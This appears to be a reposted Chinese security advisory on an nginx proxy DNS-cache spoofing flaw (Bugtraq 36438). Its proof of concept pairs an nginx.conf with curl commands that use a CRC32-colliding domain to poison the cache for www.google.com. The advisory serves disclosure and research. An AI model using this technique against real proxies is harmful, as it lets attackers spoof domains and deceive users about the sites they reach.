Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Nginx代理DNS缓存域欺骗漏洞

发布日期:2009-09-17
更新日期:2009-09-18受影响系统:
Igor Sysoev nginx 0.8.x
Igor Sysoev nginx 0.7.x
Igor Sysoev nginx 0.6.x
Igor Sysoev nginx 0.5.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 36438nginx是多平台的HTTP服务器和邮件代理服务器。 nginx对解析过的域名维护一个内部的DNS缓存,但在搜素缓存时,nginx仅检查名称的crc32是否匹配以及短名称是长名称的前缀,但没有检查名称的长度是否相等。如果nginx配置为代理缓存的话,远程攻击者就可以通过DNS投毒攻击欺骗域名,诱骗用户相信所访问的域名为合法。<*来源:Matthew Dempsky
 
  链接:http://marc.info/?l=nginx&m=125314374727296&w=2
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!使用以下nginx.conf:    events {
      worker_connections  1024;
    }    http {
      resolver 4.2.2.4;
      server {
        listen 8080;
        location / {
          proxy_pass http://$http_host$request_uri;
        }
      }
    }然后运行curl验证缓存中毒:    $ curl -H "Host: www.google.com.9nyz309.crc32.dempsky.org"
http://127.0.0.1:8080/
    <html>
    <body>
    Ho hum, nothing to see here, move along please.
    </body>
    </html>    $ curl -H "Host: www.google.com" http://127.0.0.1:8080/
    <html>
    <body>
    Oops, you shouldn"t be asking me for http://www.google.com/!
    </body>
    </html>建议:
--------------------------------------------------------------------------------
厂商补丁:Igor Sysoev
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://nginx.net/Linux Kernel perf_counter_open()函数本地溢出漏洞入侵检测 OSSEC HIDS 2.2 发布相关资讯      漏洞  DNS  Nginx 
  • Nginx和Nginx+的比较  (01月02日)
  • 使用 Ansible 安装 NGINX 和 NGINX  (10/08/2015 13:01:17)
  • 如何使用 Datadog 监控 Nginx(第  (08/25/2015 14:00:05)
  • 你应该了解Nginx的7个原因  (11/09/2015 11:20:48)
  • Nginx-1.9.5 开发版已发布下载,支  (09/23/2015 07:35:56)
  • NGINX 初期 Alpha 版 HTTP/2 模块   (08/15/2015 19:43:22)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款